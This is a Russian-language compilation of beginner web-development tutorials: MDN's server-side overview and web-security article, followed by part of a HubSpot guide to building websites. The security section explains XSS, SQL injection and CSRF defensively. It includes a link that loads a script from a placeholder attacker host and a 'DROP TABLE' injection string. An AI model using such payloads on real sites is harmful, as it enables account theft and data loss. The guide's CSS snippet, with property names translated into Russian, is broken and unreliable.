Программирование веб сайтов: Первые шаги в программировании веб-сайтов на стороне сервера — Изучение веб-разработки
Содержание
Первые шаги в программировании веб-сайтов на стороне сервера — Изучение веб-разработки
В этом модуле, посвящённом программированию на стороне сервера, мы ответим на несколько фундаментальных вопросов о программировании серверной части: «что это такое?», «чем оно отличается от программирования клиентской части?» и «почему оно так полезно?». Затем последует обзор некоторых самых популярных веб-фреймворков для серверной части и руководство по выбору наиболее подходящего фреймворка для создания вашего первого сайта. Наконец, мы завершим этот модуль вводной статьёй о безопасности веб-сервера.
Для того, чтобы начать этот модуль, вам не нужно иметь никаких знаний о программировании серверной части или даже о любом виде программирования.
Вам нужно понимать «как работает веб». Мы рекомендуем вам сперва прочесть следующие темы:
- Что такое веб-сервер
- Какое программное обеспечение мне нужно для создания сайта?
- Как загружать файлы на веб-сервер?
С этими базовыми знаниями вы будете готовы работать с модулями этого раздела.
- Введение в серверную часть
Добро пожаловать на курс программирования серверной части MDN для начинающих! В этой первой статье мы посмотрим на программирование серверной части на высоком уровне, отвечая на вопросы такие как: «что это такое?», «чем оно отличается от программирования клиентской части?» и «почему это настолько востребовано?». После прочтения этой статьи вы будете понимать всю дополнительную мощь, доступную веб-сайтам посредством программирования на стороне сервера.
- Обзор Клиент-Сервера
Теперь, когда вы познакомились с целью и потенциальными преимуществами программирования серверной части, мы собираемся узнать в подробностях, что случится, когда сервер получит «динамический запрос» от браузера. Так как большинство программ серверной части обрабатывает запросы и ответы практически одинаково, это поможет вам понять, что нужно делать при написании собственного кода.
- Фреймворки серверной части
Последняя статья рассказывает о том, что нужно делать веб-приложению серверной стороны для ответа на запросы от веб-браузера. Мы покажем здесь, как веб-фреймворки могут упростить эти задачи и поможем вам подобрать подходящий фреймворк для вашего первого серверного веб-приложения.
- Безопасность веб-сайта
Безопасность веб-сайта требует бдительности на всех этапах проектирования сайта и его использования. Эта вводная статья не сделает из вас гуру безопасности сайтов, но поможет узнать, какие первые важные шаги вы можете предпринять для повышения устойчивости вашего веб-приложения против наиболее распространённых угроз.
Этот «обзорный» модуль не содержит никакой аттестации, поскольку мы даже не прилагаем здесь для вас никакого кода. Мы действительно надеемся, что на текущем этапе у вас сформировалось чёткое понимание того, какие виды функциональности вы можете предоставить, используя программирование на стороне сервера, и вы уже приняли решение по поводу фреймворка, который вы будете использовать для создания вашего первого сайта.
Found a content problem with this page?
- Edit the page on GitHub.
- Report the content issue.
- View the source on GitHub.
Want to get more involved?
Learn how to contribute.
This page was last modified on by MDN contributors.
Веб-безопасность — Изучение веб-разработки | MDN
- Назад
- Обзор: First steps
Безопасность сайта требует бдительности во всех аспектах дизайна и использования сайта. Эта вводная статья не сделает из вас гуру безопасности веб-сайта, но она поможет вам понять, откуда приходят угрозы, и что вы можете сделать, чтобы укрепить своё веб-приложение против наиболее распространённых атак.
Условия: | Элементарная компьютерная грамотность |
---|---|
Цель: | Понять самые распространённые угрозы безопасности веб-приложений. И что вы можете сделать, чтобы уменьшить риск взлома вашего сайта. |
Интернет — опасное место! Мы регулярно слышим о том, что веб-сайты становятся недоступными из-за атак типа отказано в обслуживании, или отображение изменённой (и часто повреждённой) информации на их страницах. В других случаях миллионы паролей, адресов электронной почты и данные кредитных карт становились общедоступными, подвергая пользователей веб-сайта личному смущению или к финансовым рискам.
Цель веб-безопасности заключается в предотвращении этих (или других) видов атак. Более формальным определением веб-безопасности является: способы защиты веб-сайтов от несанкционированного доступа, использования, изменения, уничтожения или нарушения работы.
Для эффективной безопасности веб-сайта необходимо уделять особое внимание к разработке всего веб-сайта: к вашему веб-приложению, конфигурации веб-сервера, при написании политик создания и обновления паролей, а так же кода на стороне клиента. Хотя все это звучит очень зловеще, хорошая новость заключается в том, что если вы используете веб-фреймворк для серверной части, то он почти наверняка обеспечит «по умолчанию» надёжные и продуманные механизмы защиты от ряда наиболее распространённых атак. Другие атаки можно смягчить с помощью конфигурации вашего веб-сервера, например, включив HTTPS. Наконец, есть общедоступные инструменты для сканирования уязвимостей, которые могут помочь вам определить, если вы допустили какие-либо очевидные ошибки.
В оставшейся части этой статьи мы рассмотрим более подробную информацию о некоторых самых распространённых угрозах и о простых шагах, которые вы можете предпринять, чтобы защитить свой сайт.
**Примечание:**Это вводная статья, призванная помочь вам задуматься о безопасности веб-сайта, но она не является исчерпывающей.
В этом разделе перечислены лишь некоторые из наиболее распространённых угроз веб-сайта и способы их устранения. Читая, обратите внимание на то, насколько успешны угрозы, когда веб-приложение доверяет, либо недостаточно параноидально относится к данным, поступающим из браузера.
Межсайтовый скриптинг (XSS)
XSS (Cross-Site Scripting — Межсайтовый скриптинг) это термин, используемый для описания типа атак, которые позволяют злоумышленнику внедрять вредоносный код через веб-сайт в браузеры других пользователей. Поскольку внедрённый код поступает в браузер с сайта, он является доверенным и может выполнять такие действия, как отправка авторизационного файла cookieпользователя злоумышленнику. Когда у злоумышленника есть файл cookie, он может войти на сайт, как если бы он был пользователем, и сделать все, что может пользователь, например, получить доступ к данным кредитной карты, просмотреть контактные данные или изменить пароли.
Примечание: Уязвимости XSS исторически встречались чаще, чем любые другие виды угроз безопасности.
Уязвимости XSS делятся на отражённые и хранимые, в зависимости от того, как сайт возвращает внедрённый код в браузер.
- Отражённая XSS-уязвимость возникает, когда пользовательский контент, который передаётся на сервер, немедленно и без изменений возвращается для отображения в браузере. Любой скрипт в исходном пользовательском контенте запустится при загрузке новой страницы. Например, рассмотрим строку поиска по сайту, в которой поисковые слова закодированы как параметры URL, и эти слова отображаются вместе с результатами. Злоумышленник может создать поисковую ссылку, которая будет содержать вредоносный скрипт в качестве параметра (например:
http://mysite.com?q=beer<script%20src="http://evilsite.com/tricky.js"></script>
) и переслать его другому пользователю по электронной почте. Если целевой пользователь кликнет по этой «интересной ссылке», то скрипт выполнится при отображении результатов поиска. Как мы уже говорили, злоумышленник таким образом получает всю информацию, необходимую ему для входа на сайт в качестве целевого пользователя, потенциального совершения покупок от имени пользователя или получения его контактной информации. - Постоянная уязвимость XSS возникает, когда вредоносный скрипт хранится на веб-сайте, а затем снова отображается без изменений, чтобы другие пользователи могли выполнять его невольно.
Например, доска обсуждений, которая принимает комментарии, содержащие неизмененный HTML, может хранить вредоносный скрипт от злоумышленника. Когда комментарии отображаются, скрипт выполняется и может отправить злоумышленнику информацию, необходимую для доступа к учётной записи пользователя. Атака такого рода чрезвычайно популярна и мощна, потому что злоумышленник может даже не иметь прямого отношения к жертвам.
Хотя данные из запросов POST или GET являются наиболее распространённым источником уязвимостей XSS, любые данные из браузера потенциально уязвимы, такие как данные cookie, отображаемые браузером, или пользовательские файлы, которые загружаются и отображаются.
Наилучшей защитой от уязвимостей XSS является удаление или отключение любой разметки, которая потенциально может содержать инструкции по запуску кода. Для HTML это включает такие элементы, как <script>, <object>, <embed> и <link>.
Процесс изменения пользовательских данных, чтобы их нельзя было использовать для запуска сценариев или иным образом влиять на выполнение серверного кода, называется очисткой ввода. Многие веб-фреймворки автоматически очищают пользовательский ввод от HTML-форм по умолчанию.
SQL injection
Уязвимости SQL-инъекций позволяют злоумышленникам выполнять произвольный код SQL в базе данных, позволяя получать, изменять или удалять данные независимо от разрешений пользователя. Успешная инъекционная атака может подделать удостоверения, создать новые удостоверения с правами администратора, получить доступ ко всем данным на сервере или уничтожить / изменить данные, чтобы сделать их непригодными для использования.
Типы внедрения SQL включают внедрение SQL на основе ошибок, внедрение SQL на основе логических ошибок и внедрение SQL на основе времени.
Эта уязвимость присутствует, если пользовательский ввод, который передаётся в базовый оператор SQL, может изменить смысл оператора. Например, следующий код предназначен для перечисления всех пользователей с определённым именем (userName), которое было предоставлено из формы HTML:
statement = "SELECT * FROM users WHERE name = '" + userName + "';"
Если пользователь указывает реальное имя, оператор будет работать так, как задумано. Однако злонамеренный пользователь может полностью изменить поведение этого оператора SQL на новый оператор в следующем примере, просто указав текст полужирным шрифтом для userName.
SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';
Модифицированный оператор создаёт действительный оператор SQL, который удаляет таблицу пользователей и выбирает все данные из таблицы userinfo (которая раскрывает информацию о каждом пользователе). Это работает, потому что первая часть введённого текста (a ‘;) завершает исходное утверждение.
Чтобы избежать такого рода атак, вы должны убедиться, что любые пользовательские данные, которые передаются в запрос SQL, не могут изменить природу запроса. Один из способов сделать это — экранировать все символы пользовательского ввода, которые имеют особое значение в SQL.
Примечание: Примечание. Инструкция SQL обрабатывает символ ‘ как начало и конец строкового литерала. Поместив обратную косую черту перед этим символом (\ ‘), мы экранируем символ и говорим SQL вместо этого трактовать его как символ (только часть строки).
В следующей инструкции мы экранируем символ ‘. Теперь SQL будет интерпретировать имя как всю строку, выделенную жирным шрифтом (это действительно очень странное имя, но безопасное).
SELECT * FROM users WHERE name = 'a\';DROP TABLE users; SELECT * FROM userinfo WHERE \'t\' = \'t';
Веб-фреймворки будут часто заботиться о зарезервированных символах для вас. Django, например, гарантирует, что любые пользовательские данные, передаваемые в наборы запросов (модельные запросы), будут экранируются.
**Примечание:**этот раздел в значительной степени основан на информации из Wikipedia.
Подделка межсайтовых запросов (CSRF)
CSRF-атаки позволяют злоумышленнику выполнять действия, используя учётные данные другого пользователя, без его ведома или согласия.
Этот тип атаки лучше всего пояснить на примере. Джон — злоумышленник, который знает, что определённый сайт позволяет пользователям, вошедшим в систему, отправлять деньги на указанную учётную запись, используя HTTP-запрос POST
, который включает имя учётной записи и сумму денег. Джон создаёт форму, которая включает в себя его банковские реквизиты и сумму денег в виде скрытых полей, и отправляет её по электронной почте другим пользователям сайта (с кнопкой «Отправить», замаскированной под ссылку на сайт «быстрого обогащения»).
Если пользователь нажимает кнопку отправки, на сервер будет отправлен HTTP-запрос POST
, содержащий сведения о транзакции и любые файлы cookie на стороне клиента, которые браузер связал с сайтом (добавление связанных файлов cookie сайта в запросы является нормальным поведением браузера). Сервер проверит файлы cookie и использует их, чтобы определить, вошёл ли пользователь в систему и имеет ли разрешение на совершение транзакции.
В результате любой пользователь, который нажимает кнопку Отправить во время входа на торговый сайт, совершает транзакцию. Джон становится богатым.
**Примечание:**Уловка здесь в том, что Джону не нужен доступ к файлам cookie пользователя (или учётным данным). Браузер пользователя сохраняет эту информацию и автоматически включает её во все запросы к соответствующему серверу.
Один из способов предотвратить этот тип атаки — запросить сервером запросы POST
, содержащие секрет, созданный пользователем для конкретного сайта. Секрет будет предоставлен сервером при отправке веб-формы, используемой для переводов. Такой подход не позволяет Джону создать свою собственную форму, потому что он должен знать секрет, который сервер предоставляет пользователю. Даже если он узнает секрет и создаст форму для конкретного пользователя, он больше не сможет использовать ту же форму для атаки на каждого пользователя.
Веб-фреймворки часто включают такие механизмы предотвращения CSRF.
Прочие угрозы
Другие распространённые атаки / уязвимости включают:
- Clickjacking. В этой атаке злоумышленник перехватывает клики, предназначенные для видимого сайта верхнего уровня, и направляет их на скрытую ниже страницу. Этот метод можно использовать, например, для отображения законного сайта банка, но захвата учётных данных для входа в невидимый
<iframe>
(en-US) , контролируемый злоумышленником. Clickjacking также можно использовать для того, чтобы заставить пользователя нажать кнопку на видимом сайте, но при этом на самом деле невольно нажимать совершенно другую кнопку. В качестве защиты ваш сайт может предотвратить встраивание себя в iframe на другом сайте, установив соответствующие заголовки HTTP. - Denial of Service (en-US) (DoS). DoS обычно достигается за счёт наводнения целевого сайта поддельными запросами, так что доступ к сайту нарушается для законных пользователей. Запросы могут быть просто многочисленными или по отдельности потреблять большие объёмы ресурсов (например, медленное чтение или загрузка больших файлов). Защита от DoS обычно работает, выявляя и блокируя «плохой» трафик, пропуская при этом легитимные сообщения. Эти средства защиты обычно расположены перед веб-сервером или на нем (они не являются частью самого веб-приложения).
- Directory Traversal (Файл и раскрытие). В этой атаке злоумышленник пытается получить доступ к частям файловой системы веб-сервера, к которым у него не должно быть доступа. Эта уязвимость возникает, когда пользователь может передавать имена файлов, содержащие символы навигации файловой системы (например,
../../
). Решение состоит в том, чтобы очищать ввод перед его использованием. - File Inclusion. В этой атаке пользователь может «случайно» указать файл для отображения или выполнения в данных, передаваемых на сервер. После загрузки этот файл может выполняться на веб-сервере или на стороне клиента (что приводит к XSS-атаке). Решение состоит в том, чтобы дезинфицировать ввод перед его использованием.
- Внедрение команд. Атаки с внедрением команд позволяют злоумышленнику выполнять произвольные системные команды в операционной системе хоста. Решение состоит в том, чтобы дезинфицировать вводимые пользователем данные до того, как их можно будет использовать в системных вызовах.
Полный список угроз безопасности веб-сайтов см. Category: Web security exploits (Wikipedia) и Category: Attack (Open Web Application Security Project).
Почти все эксплойты безопасности, описанные в предыдущих разделах, успешны, когда веб-приложение доверяет данным из браузера. Что бы вы ни делали для повышения безопасности своего веб-сайта, вы должны дезинфицировать все данные, исходящие от пользователей, прежде чем они будут отображаться в браузере, использоваться в запросах SQL или передаваться в вызов операционной системы или файловой системы.
Предупреждение: Внимание! Самый важный урок, который вы можете извлечь о безопасности веб-сайтов: никогда не доверяйте данным из браузера. Это включает, помимо прочего, данные в параметрах URL-адресов запросов GET
, запросов POST
, заголовков HTTP и файлов cookie, а также файлов, загруженных пользователем. Всегда проверяйте и дезинфицируйте все входящие данные. Всегда предполагайте худшее!
Вы можете предпринять ряд других конкретных шагов:
- Используйте более эффективное управление паролями. Поощряйте регулярную смену надёжных паролей. Рассмотрите возможность двухфакторной аутентификации для вашего сайта, чтобы в дополнение к паролю пользователь должен был ввести другой код аутентификации (обычно тот, который доставляется через какое-то физическое оборудование, которое будет иметь только пользователь, например, код в SMS, отправленном на его телефон).
- Настройте свой веб-сервер для использования HTTPS и HTTP Strict Transport Security (en-US) (HSTS). HTTPS шифрует данные, передаваемые между вашим клиентом и сервером. Это гарантирует, что учётные данные для входа, файлы cookie, данные запросов
POST
и информация заголовка не будут легко доступны для злоумышленников. - Следите за наиболее популярными угрозами (текущий список OWASP находится здесь) и в первую очередь устраняйте наиболее распространённые уязвимости.
- Используйте инструменты сканирования уязвимостей, чтобы выполнить автоматическое тестирование безопасности на вашем сайте. Позже ваш очень успешный веб-сайт может также обнаруживать ошибки, предлагая вознаграждение за обнаружение ошибок, как это делает здесь Mozilla.
- Храните и отображайте только те данные, которые вам нужны. Например, если ваши пользователи должны хранить конфиденциальную информацию, такую как данные кредитной карты, отображайте часть номера карты только для того, чтобы он мог быть идентифицирован пользователем, и недостаточно, чтобы его мог скопировать злоумышленник и использовать на другом сайте. Самый распространённый шаблон в настоящее время — отображение только последних 4 цифр номера кредитной карты.
Веб-фреймворки могут помочь смягчить многие из наиболее распространённых уязвимостей.
В этой статье объясняется концепция веб-безопасности и некоторые из наиболее распространённых угроз, от которых ваш веб-сайт должен пытаться защититься. Самое главное, вы должны понимать, что веб-приложение не может доверять никаким данным из веб-браузера. Все пользовательские данные должны быть очищены перед отображением или использованием в SQL-запросах и вызовах файловой системы.
Этой статьёй вы подошли к концу этого модуля, охватывающего ваши первые шаги в программировании на стороне сервера. Мы надеемся, что вам понравилось изучать эти фундаментальные концепции, и теперь вы готовы выбрать веб-платформу и начать программировать.
- Назад
- Обзор: First steps
- Введение в серверную часть
- Обзор технологии клиент-сервер
- Серверные веб-фреймворки
- Безопасность веб-сайта
Found a content problem with this page?
- Edit the page on GitHub.
- Report the content issue.
- View the source on GitHub.
Want to get more involved?
Learn how to contribute.
This page was last modified on by MDN contributors.
Руководство для начинающих по разработке веб-сайтов
Что такое разработка веб-сайтов?
Разработка веб-сайта — это общий термин для работы, связанной с созданием веб-сайта. Это включает в себя все, от разметки и кодирования до сценариев, настройки сети и разработки CMS.
В то время как веб-разработка обычно относится к веб-разметке и кодированию, разработка веб-сайтов включает в себя все связанные задачи разработки, такие как сценарии на стороне клиента, сценарии на стороне сервера, настройка безопасности сервера и сети, разработка электронной коммерции и разработка системы управления контентом (CMS). .
В этом руководстве мы рассмотрим основы веб-разработки, процесс создания веб-сайта и дополнительные ресурсы для тех, кто хочет узнать больше о разработке или стать разработчиком самостоятельно.
Продолжайте читать, чтобы погрузиться в разработку веб-сайтов, или используйте ссылки на главы, чтобы перемещаться по руководству.
Основы веб-разработки
Типы веб-разработки
Процесс веб-разработки
Ресурсы веб-разработки
Почему важна веб-разработка?
Интернет никуда не денется. Фактически, он стал порталом и основным методом исследования, связи, образования и развлечения в мире. По состоянию на 2021 год во всем мире насчитывалось 4,66 миллиарда пользователей Интернета — более половины населения мира.
Учитывая быстрорастущее число пользователей Интернета, неудивительно, что веб-разработка является быстрорастущей отраслью. Ожидается, что с настоящего момента до 2030 года занятость веб-разработчиков вырастет на 13%, что намного быстрее, чем в большинстве других технологических профессий.
Узнайте, почему тысячи клиентов используют CMS Hub для создания оптимизированного веб-сайта, который интегрируется с данными HubSpot CRM и полным маркетинговым пакетом.
В следующем разделе мы рассмотрим основы веб-разработки и ответим на некоторые распространенные вопросы.
Основы веб-разработки
- Что такое веб-сайт?
- Что такое IP-адрес?
- Что означает HTTP?
- Что такое кодирование?
- Что означает интерфейс?
- Что означает серверная часть?
- Что такое CMS?
- Что такое кибербезопасность?
Теперь, когда мы определили веб-разработку, давайте рассмотрим некоторые основы веб-разработки.
1. Что такое веб-сайт?
Веб-сайты — это файлы, хранящиеся на серверах, которые представляют собой компьютеры, на которых размещены веб-сайты (причудливый термин «хранить файлы для»). Эти серверы подключены к гигантской сети под названием Интернет.
Браузеры — это компьютерные программы, которые загружают веб-сайты через подключение к Интернету, такие как Google Chrome или Internet Explorer, а компьютеры, используемые для доступа к этим веб-сайтам, называются «клиентами».
2. Что такое IP-адрес?
Чтобы получить доступ к веб-сайту, вам необходимо знать его адрес интернет-протокола (IP). IP-адрес — это уникальная последовательность чисел. Каждое устройство имеет IP-адрес, чтобы отличать его от миллиардов веб-сайтов и устройств, подключенных через Интернет.
IP-адрес HubSpot — 104.16.249.5. Вы можете узнать IP-адрес любого веб-сайта, посетив такой сайт, как Site 24×7, или используя командную строку в Windows или сетевую утилиту > Traceroute на MacBook.
Чтобы найти IP-адрес вашего устройства, вы также можете ввести «какой у меня IP-адрес» в поисковом браузере.
Хотя вы можете получить доступ к веб-сайту, используя его IP-адрес, большинство пользователей Интернета предпочитают использовать доменные имена или использовать поисковые системы.
3. Что означает HTTP?
Протокол передачи гипертекста (HTTP) соединяет вас и запрос вашего веб-сайта с удаленным сервером, на котором хранятся все данные веб-сайта. Это набор правил (протокол), который определяет, как сообщения должны отправляться через Интернет. Это позволяет вам переходить между страницами сайта и веб-сайтами.
Когда вы вводите веб-сайт в свой веб-браузер или ищете что-то через поисковую систему, HTTP обеспечивает структуру, позволяющую клиенту (компьютеру) и серверу говорить на одном языке, когда они делают запросы и ответы друг другу через Интернет. . По сути, это переводчик между вами и Интернетом — он читает запрос вашего веб-сайта, считывает код, отправленный с сервера, и переводит его для вас в виде веб-сайта.
4. Что такое кодирование?
Кодирование — это написание кода для серверов и приложений с использованием языков программирования. Их называют «языками», потому что они включают словарный запас и грамматические правила для общения с компьютерами. Они также включают специальные команды, сокращения и знаки препинания, которые могут быть прочитаны только устройствами и программами.
Все программное обеспечение написано как минимум на одном языке программирования, но языки различаются в зависимости от платформы, операционной системы и стиля. Все языки попадают в одну из двух категорий: front-end и back-end.
5. Что означает интерфейс?
Внешний интерфейс (или клиентская часть) — это часть веб-сайта или программного обеспечения, которую вы видите и с которой взаимодействуете как пользователь Интернета. Когда информация веб-сайта передается с сервера в браузер, интерфейсные языки программирования позволяют веб-сайту функционировать без необходимости постоянного «общения» с Интернетом.
Интерфейсный код позволяет пользователям взаимодействовать с веб-сайтом и воспроизводить видео, увеличивать или уменьшать изображения, выделять текст и т. д. Веб-разработчики, работающие над интерфейсным кодированием, работают над клиентской разработкой.
6. Что означает серверная часть?
Back-end (или серверная часть) — это сторона, которую вы не видите при использовании Интернета. Это цифровая инфраструктура, и для неразработчиков она выглядит как набор цифр, букв и символов.
Внутренних языков программирования больше, чем интерфейсных. Это потому, что браузеры — во внешнем интерфейсе — понимают только HTML, CSS и JavaScript, а сервер — во внутреннем — можно настроить так, чтобы он понимал практически любой язык.
7. Что такое CMS?
Система управления контентом (CMS) — это веб-приложение или набор программ, используемых для создания веб-контента и управления им. (Примечание: CMS — это не то же самое, что конструкторы сайтов, такие как Squarespace или Wix.)
Узнайте, почему тысячи клиентов используют CMS Hub для создания оптимизированного веб-сайта, который интегрируется с их данными HubSpot CRM и полным маркетинговым пакетом.
Хотя создание веб-сайта не требуется, использование CMS упрощает задачу. Он предоставляет строительные блоки (например, плагины и надстройки) и позволяет создавать структуру с помощью вашего кода. CMS часто используются для электронной коммерции и ведения блогов, но они полезны для всех типов веб-сайтов.
8. Что такое кибербезопасность?
Всегда есть злоумышленники, которые ищут уязвимости на веб-сайтах, чтобы раскрыть личную информацию, украсть данные и вывести из строя серверы. Кибербезопасность — это практика защиты данных, сетей и компьютеров от этих угроз.
Методы, используемые хакерами, постоянно совершенствуются, равно как и меры безопасности, принимаемые для защиты от них. Непонимание того, как ваш сайт может быть атакован, может привести к катастрофе.
В результате базовое понимание лучших практик кибербезопасности имеет решающее значение для эффективной веб-разработки. Вы также должны проводить проверки безопасности на постоянной основе.
Далее давайте рассмотрим типы веб-разработки, на которых может специализироваться разработчик.
Независимо от того, хотите ли вы нанять веб-разработчика или стать им, вы должны понимать различные типы веб-разработки, которыми могут овладеть разработчики.
Эти различные типы веб-разработки в первую очередь относятся к различным секторам профессии, в которых могут работать веб-разработчики. Некоторые из этих различий пересекаются, и веб-разработчики часто осваивают несколько типов веб-разработки.
1. Начальная разработка
Разработчики внешнего интерфейса работают с клиентской или пользовательской стороной веб-сайтов, программ и программного обеспечения — другими словами, с тем, что видят пользователи. Они проектируют и разрабатывают визуальные аспекты, включая макет, навигацию, графику и другую эстетику.
Основная задача этих разработчиков — создавать интерфейсы, которые помогают пользователям достигать своих целей, поэтому они также часто принимают участие в аспекте взаимодействия с пользователем в своих проектах.
2. Back-end разработка
Если интерфейс — это то, что видят пользователи, то back-end — это то, что они не видят. Бэкенд-веб-разработчики работают на серверах веб-сайтов, программ и программного обеспечения, чтобы убедиться, что за кулисами все работает должным образом.
Эти разработчики работают с такими системами, как серверы, операционные системы, API и базы данных, и управляют кодом для обеспечения безопасности, контента и архитектуры сайта. Они сотрудничают с фронтенд-разработчиками, чтобы донести свои продукты до пользователей.
3. Разработка полного стека
Разработчики полного стека работают как с внешней, так и с внутренней частью веб-сайта. Они могут создать веб-сайт, приложение или программу от начала до конца. «Стек» относится к различным технологиям, которые выполняют разные функции на одном и том же веб-сайте, такие как сервер, интерфейс и т. д.
Поскольку разработчикам полного стека требуются годы работы в этой области, чтобы накопить необходимый опыт, на эту должность часто претендуют. Их всесторонние знания помогают им оптимизировать производительность, выявлять проблемы до их возникновения и помогать членам команды понимать различные части веб-службы.
4. Разработка веб-сайтов
Разработчики веб-сайтов могут быть внешними, внутренними или полными разработчиками. Однако эти профессионалы специализируются на создании веб-сайтов, а не мобильных приложений, программного обеспечения для настольных компьютеров или видеоигр.
5. Разработка для настольных компьютеров
Разработчики для настольных компьютеров специализируются на создании программных приложений, которые запускаются локально на вашем устройстве, а не через Интернет в веб-браузере. Иногда набор навыков этих разработчиков совпадает с набором навыков веб-разработчиков, если приложение может работать как в сети, так и вне ее.
6. Разработка мобильных приложений
Разработчики мобильных приложений создают приложения для мобильных устройств, таких как смартфоны или планшеты. Мобильные приложения работают иначе, чем другие веб-сайты и программы, поэтому требуют отдельного набора навыков разработки и знания специализированных языков программирования.
7. Разработка игр
Разработчики игр специализируются на написании кода для видеоигр, в том числе игр для консолей (Xbox, PlayStation и т. д.), игр для ПК и мобильных игр, что означает, что эта специальность частично совпадает с разработкой для мобильных устройств.
8. Разработка встраиваемых систем
Разработчики встраиваемых систем работают со всем оборудованием, кроме компьютеров (или, по крайней мере, с тем, что большинство из нас представляет себе как «компьютеры», с клавиатурой и экраном). Сюда входят электронные интерфейсы, потребительские устройства, устройства IoT, системы реального времени и многое другое.
В связи с недавним ростом числа взаимосвязанных устройств, таких как интеллектуальные устройства, технологии Bluetooth и виртуальные помощники, разработка встраиваемых систем становится востребованной практикой.
9. Разработка безопасности
Разработчики безопасности устанавливают методы и процедуры для обеспечения безопасности программного обеспечения или веб-сайта. Эти разработчики обычно работают как этичные хакеры, пытаясь «взломать» веб-сайты, чтобы выявить уязвимости, не намереваясь причинить вред. Они также создают системы, которые обнаруживают и устраняют угрозы безопасности.
Теперь давайте углубимся в процесс веб-разработки.
Процесс разработки веб-сайта
Процесс создания веб-сайта не так прост, как 1-2-3. Каждый путь разработки отличается в зависимости от типа веб-сайта, языков программирования и ресурсов.
Следующий раздел служит кратким обзором процесса веб-разработки и кратким введением в наиболее распространенные языки и опции CMS.
1. Составьте план.
Прежде чем браться за бумагу или за клавиатуру, очень важно сначала связаться с командами и персоналом вашей организации, чтобы разработать план для вашего веб-сайта.
Вот несколько вопросов, которые следует рассмотреть перед созданием первого проекта сайта:
- Какова цель вашего сайта?
- Кто ваша аудитория и что вы хотите, чтобы они делали на вашем сайте?
- Какой тип веб-сайта вы создаете? (например, основная информация, членство, интернет-магазин)
- Какой контент вы собираетесь публиковать и в каком объеме?
- Какова цель этого контента?
- Как вы будете структурировать свой веб-сайт для лучшей навигации?
- Какой у вас бюджет?
Чтобы ответить на вопросы, необходимо связаться с вашими отделами веб-разработки, маркетинга и финансов, чтобы определить ваши приоритеты и принять обоснованные решения.
Проще говоря? Гораздо проще создать дорожную карту в начале процесса, чем откатывать свой прогресс на контрольно-пропускном пункте.
2. Создайте каркас.
Все хорошие веб-сайты начинаются с плана. Разработчики называют это каркасом. Это не обязательно должен быть официальный документ; это просто видение вашего сайта, которое даст вам и вашим разработчикам направление и место для начала. Вы можете нарисовать его на доске или использовать такие инструменты, как Invision, Slickplan или Mindnode.
Каркасы — это чисто визуальные инструменты, которые помогут вам понять, где текст и изображения будут располагаться на отдельных веб-страницах. Вы можете использовать пустые поля и «фиктивный текст», чтобы получить представление о том, как ваш контент будет отображаться в интерфейсе. Поработайте со своим разработчиком над созданием каркасов, чтобы у него было представление о том, что вы изображаете.
3. Составьте карту сайта.
Теперь пришло время создать карту сайта (не путать с sitemap. XML, который представляет собой XML-файл, помогающий поисковым системам сканировать и находить ваш сайт). Точно так же, как бизнес-план дает потенциальному инвестору представление о ваших целях и результатах, карта сайта дает разработчику информацию, необходимую для реализации вашего видения. Вы можете создать свою карту сайта самостоятельно или работать с вашим разработчиком (разработчиками).
Вот несколько вопросов, которые следует задать себе при планировании сайта:
- Какие отдельные страницы вам нужны?
- Какой контент будет на этих страницах?
- Как организовать эти страницы по категориям?
- Какова иерархия страниц на вашем сайте?
- Как страницы будут связаны друг с другом?
- Какие страницы и категории важны для вашего сайта и взаимодействия с пользователем?
- Какие страницы или категории можно удалить или объединить?
Опять же, рекомендуется проконсультироваться с другими командами в вашей организации. Если у вас есть команда SEO и/или контент-стратегии, их вклад будет иметь решающее значение в структуре ссылок и категоризации ваших страниц.
3. Напишите код вашего сайта.
Следующим шагом в процессе веб-разработки является написание кода.
Разработчики будут использовать разные языки кодирования для внешнего и внутреннего интерфейса веб-сайтов, а также для различных функций сайта (таких как дизайн, интерактивность и т. д.). Эти разные языки работают вместе для создания и запуска вашего сайта.
Начнем с наиболее часто используемых языков.
HTML
Язык гипертекстовой разметки (HTML) используется с 1990-х годов. Это основа всех веб-сайтов и представляет собой минимум того, что необходимо для создания веб-сайта. Хотя можно создать веб-сайт только с помощью HTML, он не будет выглядеть особенно привлекательным.
Ниже приведен HTML-код основной кнопки Bootstrap.
Такие языки, как CSS и JavaScript, улучшают и изменяют базовую структуру сайта, построенную с помощью HTML-кодов. HTML5 является самой последней версией и поддерживает кроссплатформенные функции браузера, что делает его популярным в разработке мобильных приложений.
CSS
Каскадные таблицы стилей (CSS) были разработаны в конце 1990-х годов. Он добавляет элементы дизайна, такие как типографика, цвета и макеты, на веб-сайты, чтобы улучшить общий «внешний вид» веб-сайтов.
CSS позволяет разработчикам преобразовывать ваш веб-сайт в соответствии с эстетикой, которую вы представляли для своего сайта, и, как и HTML5, CSS совместим со всеми браузерами.
Вот фрагмент кода для настройки элемента jumbotron в Bootstrap CSS.
.jumbotron {
background: #27a967;
цвет: белый;
выравнивание текста: по центру;
}.jumbotron p {
цвет: белый;
размер шрифта: 26px;
}
JavaScript
JavaScript — это вишенка на вершине языков программирования. Созданный в середине 90-х, JavaScript используется для добавления функциональности веб-сайтам. Разработчики используют его для добавления анимации, автоматизации задач на определенных страницах и добавления интерактивных функций, улучшающих взаимодействие с пользователем.
JavaScript быстро развивается. Когда-то считавшийся «игрушечным» языком, сейчас JavaScript является наиболее широко используемым языком кодирования в мире. С помощью Node.Js это теперь внутренний язык кодирования. Это первый язык, понятный браузерам, и некоторые даже обсуждали возможность применения к нему машинного обучения.
Ниже приведен фрагмент кода JavaScript для автоматического открытия ссылок в новом окне в WordPress.
HTML, CSS, JavaScript — «большая тройка» веб-разработки. Почти каждый веб-сайт использует их в той или иной степени. Существует множество других языков, таких как серверные языки, такие как Java, C++, Python и SQL, но понимание этих трех является основополагающим для ваших знаний о разработке веб-сайтов.
4. Создайте серверную часть своего веб-сайта.
Написание кода может быть одной из самых сложных частей веб-разработки, но далеко не единственным компонентом. Вы также должны создать внутреннюю и внешнюю структуру и дизайн сайта.
Начнем с задней части.
Серверная часть обрабатывает данные, которые обеспечивают функциональность интерфейса. Например, серверная часть Facebook хранит мои фотографии, так что клиентская часть может позволить другим просматривать их. Он состоит из двух ключевых компонентов:
- Базы данных , которые отвечают за хранение, организацию и обработку данных, чтобы их можно было получить по запросам сервера.
